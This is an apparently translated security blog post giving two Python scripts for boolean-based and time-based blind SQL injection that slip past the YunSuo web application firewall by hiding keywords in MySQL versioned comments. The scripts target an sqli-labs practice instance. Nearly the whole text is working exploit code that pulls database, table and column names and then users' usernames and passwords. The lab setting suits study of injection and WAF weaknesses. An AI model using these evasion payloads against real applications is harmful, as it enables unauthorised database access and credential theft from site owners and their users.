0x01: Preface

I previously wrote a tamper for getting past YunSuo (云锁), but its limitation is obvious: it only handles UNION-based injection. I had intended to write tampers for the other injection techniques as well, but once I started I found that sqlmap is fairly restrictive for blind injection, and writing my own script is easier than writing a tamper. YunSuo is actually simpler than SafeDog (安全狗): it filters very little, and the only real obstacle is `select ... from`. Get that past the filter and you are done.

0x02: Boolean-based

#coding:utf-8
#by pureqh

import requests

# Boolean-based blind injection against sqli-labs Less-5 behind YunSuo.
# `and` and `select` are hidden inside MySQL versioned comments
# (/*!11444...*/ is executed because 1.14.44 is below any real server version),
# while /*!80000aaa*/ is skipped by a pre-8.0 server, so database/*!80000aaa*/()
# reaches MySQL as database() without the WAF seeing "database(".
# The trailing "*/--+" closes the still-open /*!11444select ... comment and
# comments out the rest of the query ("+" becomes the space "-- " needs).
sql = ""
for i in range(1, 17):
    for j in range(33, 127):
        #url = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ ascii(substr((select user/*!80000aaa*/()),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1'='1"
        #url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!11444select table_name from information_schema.tables where table_schema=database/*!80000aaa*/() limit 3,1),"+str(i)+",1))="+str(j)+" */--+"
        #url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!11444select group_concat(column_name) from information_schema.columns where table_schema='security' ),"+str(i)+",1))="+str(j)+" */--+"
        url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!11444select group_concat(username,password) from users),"+str(i)+",1))="+str(j)+" */--+"
        r = requests.get(url=url)
        # Less-5 prints "You are in..." only when the injected condition is true
        if "are" in r.text:
            sql += chr(j)
            print(sql)
            break

0x03: Time-based

#coding:utf-8
#by pureqh
import requests

# Time-based blind injection with the same comment tricks: when the condition
# is true MySQL runs sleep(2), which trips the 1.5 s client-side timeout.
sql = ''
for x in range(1, 300):
    for y in range(33, 127):
        #url1 = "http://192.168.150.139/sqli/Less-9/?id=1' /*!11444and*/ if(((ascii(substr((select database/*!80000aaa*/()),%d,1)))=%d),sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
        #url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!11444select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))=%d,sleep(2),false) */--+"
        #url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!11444select group_concat(column_name) from information_schema.columns where table_schema='security'),%d,1))=%d,sleep(2),false) */--+"
        url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!11444select group_concat(username,password) from users),%d,1))=%d,sleep(2),false) */--+"
        url2 = url1 % (x, y)
        try:
            f = requests.get(url=url2, timeout=1.5)
        except requests.exceptions.Timeout:
            # only a timeout means "true"; a connection error must not be
            # mistaken for a matching character
            sql += chr(y)
            print(sql)
            break

0x04: Closing remarks

Both scripts still walk through the ASCII range one value at a time instead of using binary search, so they are painfully slow. I have not had time to optimise them lately, so they stay as they are for now.
